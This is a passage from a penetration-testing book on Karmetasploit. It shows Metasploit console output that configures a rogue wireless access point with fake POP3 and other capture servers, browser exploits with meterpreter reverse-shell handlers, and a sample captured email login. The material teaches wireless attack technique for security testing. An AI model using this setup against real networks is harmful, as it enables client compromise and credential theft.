Karmetasploit
181
URIPATH => /ads
resource (karma.rc)>
run
[*] Auxiliary module execution completed
resource (karma.rc)> use auxiliary/server/capture/pop3
resource (karma.rc)>
set SRVPORT 110
SRVPORT => 110
resource (karma.rc)>
set SSL false
SSL => false
resource (karma.rc)>
run
. . . SNIP . . .
[*] Starting exploit windows/browser/winzip_fileview with payload windows/
meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:55550/N9wReDJhfKg
[*] Local IP: http://192.168.1.101:55550/N9wReDJhfKg
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 10.0.0.1:3333
[*] Starting the payload handler...
[*] Started reverse handler on 10.0.0.1:6666
[*] Starting the payload handler...
[*] --- Done, found 15 exploit modules
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://192.168.1.101:55550/ads
[*] Server started.
As you can see, a great deal is happening with the resource file. In this
listing, the
LHOST
address is set to
10.0.0.1
at , the POP3 service (among others)
is started at , the
autopwn
exploits are loaded at , and payloads are config-
ured at .
Credential Harvesting
When a client connects to our malicious access point, the messages file we
are tailing will show us when an IP address is handed out. This is our cue to
switch back to
msfconsole
to see what is happening. Here, we see that a client
connects and is assigned an IP address:
Apr 2 15:07:34 bt dhcpd: DHCPDISCOVER from 00:17:9a:b2:b1:6d via at0
Apr 2 15:07:35 bt dhcpd: DHCPOFFER on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
Apr 2 15:07:35 bt dhcpd: DHCPREQUEST for 10.0.0.100 (10.0.0.1) from 00:17:9a:b2:b1:6d
(v-xp-sp2-bare) via at0
Apr 2 15:07:35 bt dhcpd: DHCPACK on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
The first thing our target does is open an email client. Karmetasploit is
waiting, as shown here:
[*] DNS 10.0.0.100:1049 XID 45030 (IN::A time.windows.com)
[*] DNS 10.0.0.100:1049 XID 47591 (IN::A pop3.securemail.com)
[*] POP3 LOGIN 10.0.0.100:1102 bsmith / s3cr3tp4s5